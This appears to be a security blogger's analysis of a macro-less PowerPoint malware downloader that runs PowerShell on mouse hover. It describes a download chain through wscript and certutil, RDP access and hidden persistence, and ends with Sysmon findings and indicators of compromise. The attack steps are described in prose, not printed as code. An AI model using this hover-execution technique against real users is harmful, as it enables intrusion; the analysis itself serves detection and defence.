First,

I would like to thank “Marry Trame” at peerlyst.com for posting about this new method that was discovered for a malware downloader. A link to the original post can be found at the bottom of this analysis. I would like to note that I edited the domain to my own in the PowerPoint so it wouldn’t actually successfully reach to the C&C server for the Malicious .jse file.

Analysis Summary:

This PowerPoint Document was interesting to analyze. First of all this document was interesting as it did not rely on Macros, Javascript or VBA for the execution method. Which means this document does not conform to the normal exploitation methods. When the user opens the document they are presented with the text “Loading…Please wait” which is displayed as a blue hyperlink to the user. When the user mouses over the text(which is the most common way users would check a hyperlink) it results in Powerpoint executing PowerShell. This is accomplished by an element definition for a hover action. This hover action is setup to execute a program in PowerPoint once the user mouses over the text. In the resources definition of slide1 “rID2” is defined as a hyperlink where the target is a PowerShell command. Due to its length it can be seen in the step by step screenshot explanations below.

When that PowerShell is executed it reaches out to the domain “cccn.nl” for a c.php file and downloads it to disk as a file named “ii.jse” in the temp folder. That gets executed in wscript.exe and then that drops a file named “168.gop” which the JavaScript then executes certutil.exe with the -decode parameter. certutil.exe then supplies 168.gop as the file to decode and saves it in the temp folder as “484.exe”. Then “484.exe” is executed and it spawns mstsc.exe to allow RDP access to the system. After this 484.exe was observed being renamed and saved to AppData\Roaming\Microsoft\Internet Explorer\sectcms.exe by mstsc.exe and then it gets re-executed from the new location. A .bat file was observed being written to disk then executed in cmd.exe. The purpose of this bat file appears to have been to change the attributes of the sectcms.exe program to be hidden, marked as a system file and set as read only. It also deletes any of the files with the following extensions in the temp folder .txt/.exe/.gop/.log/.jse . I sandboxed the payload for 8 hours but no threat actors connected to the system. So I was unable to see what other purpose the backdoor might have if the threat actors had taken specific interest in the system.

Screenshots of Analysis:

Screenshot of Slideshow user is presented after opening PowerPoint:



Warning Message Displayed When User Mouses Over the “Loading…Please wait” text:



If User Enables the Content then they are presented with the following Powershell prompt which quickly hides itself:



Here is a modified callout I did just to test if the powershell was proxy aware – I did this by editing the XML in the PowerPoint Slide:



This is the Slide1 Element Definition for the “rID2” element – It is easy to see that a PowerShell command is set as the target for the Hyperlink:



This is the Slide1 XML for the slide itself. It is easily visible in the red highlighted section how the hoveraction is defined in Slide1:



——————————————————————————————-

Sysmon Screenshots:

Sysmon Logging of PowerPoint initially opening:



Sysmon Logged the Execution of the Powershell Command Aswell in its decoded form:



Sysmon Logged the initial Process Creation of the Malicious Payload:



Followed By the Process Creation of the mstsc.exe process which is used for RDP access to an exploited system:



Then the Original Payload process is logged as being Terminated:



Sysmon then logged the file creation of a copy of the original payload. It was named sectcms.exe and hidden under the App Data folder:



Sysmon then captured the re-execution of the newly moved payload:



Sysmon then Logged a bat file being created in the Temp Folder:



Sysmon Then logged the execution of the .bat file through cmd.exe. The source program of the execution was mstsc.exe:



One of the functions of the .bat file were to add the hide, system and read only flags to the payload under AppData:



Sysmon then logged the process creation of a second instance of the sectcms.exe payload:



Finally, Sysmon then logged the termination of one of the two instances of the payload which is named sectcms.exe:



Indicators of Compromise:

File: order.ppsx

MD5: 823c408af2d2b19088935a07c03b4222

SHA1: df99061e8ad75929af5ac1a11b29f4122a84edaf

SHA256: f05af917f6cbd7294bd312a6aad70d071426ce5c24cf21e6898341d9f85013c0

SHA512: 2cc9e87e0d46fdd705ed429abb837015757744783bf1e904f9f22d56288b9554a1bc450142e2b1644a4912c12a522391b354d97956e4cb94890744266249b7f9

File: C:\Users\Current User\AppData\Local\Temp\168.gop

MD5: 9B5AC6C4FD5355700407962F7F51666C

SHA: 9FDB4CD70BBFB058D450AC9A6985BF3C71840906

SHA-256: E97B266D0B5AF843E49579C65838CEC113562A053B5F87A69E8135A0A82564E5

SHA-512: AB85132D845437A7900E03C2F3FA773433815A4893E16F7716A5F800558B5F01827F25463EAFF619F804C484A1D23CDD5F2BCCC0F91B4B4D0C117E87D830B1B3

File: C:\Users\Current User\AppData\Local\Temp\484.exe

File: C:\Users\Current User\AppData\Roaming\Microsoft\Internet Explorer\sectcms.exe

MD5: 13CDBD8C31155610B628423DC2720419

SHA: 7633A023852D5A0B625423BFFC3BBB14B81C6A0C

SHA-256: 55C69D2B82ADDD7A0CD3BEBE910CD42B7343BD3FAA7593356BCDCA13DD73A0EF

SHA-512: 19139DAE43751368E19C4963C4E087C6295CC757B215A32CB95E12BDD82BB168DB91EA3385E1D08B9A5D829549DFBB34C17CA29BFCC669C7EAE51456FCD7CA49

File: C:\Users\Current User\AppData\Local\Temp\ii.jse

MD5: F5B3D1128731CAC04B2DC955C1A41114

SHA: 104919078A6D688E5848FF01B667B4D672B9B447

SHA-256: 55821B2BE825629D6674884D93006440D131F77BED216D36EA20E4930A280302

SHA-512: 65D8A4CB792E4865A216D25068274CA853165A17E2154F773D367876DCC36E7A7330B7488F05F4EE899E40BCAA5F3D827E1E1DF4915C9693A8EF9CAEBD6D4BFB

C2 Communications:

hxxp://cccn.nl/c.php

hxxp://cccn.nl/2.2

IP Address of C2/Payload Domain:

46.21.169.110

References:

https://www.peerlyst.com/posts/microsoft-office-malware-now-being-delivered-without-macros-but-using-pps-url-mouse-hover-marry-tramp?trk=search_page_search_result

https://www.joesecurity.org/reports/report-823c408af2d2b19088935a07c03b4222.html

https://www.hybrid-analysis.com/sample/796a386b43f12b99568f55166e339fcf43a4792d292bdd05dafa97ee32518921?environmentId=100

https://www.virustotal.com/en/file/796a386b43f12b99568f55166e339fcf43a4792d292bdd05dafa97ee32518921/analysis/